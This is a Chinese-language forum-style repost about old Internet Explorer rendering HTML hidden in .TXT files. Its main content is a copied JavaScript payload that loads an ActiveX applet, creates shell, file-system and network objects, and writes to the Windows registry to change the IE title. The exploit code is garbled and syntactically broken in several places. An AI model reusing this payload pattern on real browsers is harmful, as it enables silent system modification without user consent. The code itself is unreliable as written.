欢迎大家来到IT世界,在知识的湖畔探索吧!
IE能将*.TXT中的HTML语句读出已经是众所周知的了,这个漏洞的危害性及普遍性甚至说利用性还是不高的.
大家对HTML的语句可能造成的危害都有一定的共识,但对TXT呢,我想防患意识就不高了,上次我碰到REDCRACK,他和我开玩笑的时候,就让我去一个地方,后台开了个TXT文档,当时我没觉得不妥,事后一查,好家伙HAPPY TIME等大家伙都来了.于是我想,这个结合MIME头的运用, 就可以有下载的权限了吧,现在的很多html语法都可以改注册表,推而广之,TXT的威力也是一样的,但隐蔽性绝对更高.
下面是抄来的一段代码,大家可以看看
<SCRIPT Language=”javascript” type=”text/javascript”> //这里开始调用一个JS脚本
<!–
document.write(“<APPLETHEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>”);
function f()
{ try }
{ //ActiveX initialization
a1=document.applets[0];
a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}”);
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID(“{0D43FE01-F093-11CF-8940-00A0C9054228}”);
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID(“{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}”);
a1.createInstance();
Net = a1.GetObject(); }
{ try }
if (documents.cookie.indexOf(“Chg”) == -1)
{ Shl.RegWrite(“HKLM\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle”,”I’amChinese!!”);Shl.RegWrite (“HKCU\\Software
\\Microsoft\\Internet Explorer\\Main\Window Title”, “I’am Chinese!”); //这里把IE title修改成了”I’am Chinese!”
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie=”Chg=general;expires=”+ expdate.toGMTString() + “; path=/;” }
{catch(e) }
{catch(e) }
{ function init() }
{ setTimeout(“f()”, 1000); }
init();
// –>
</SCRIPT>
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://itzsg.com/30099.html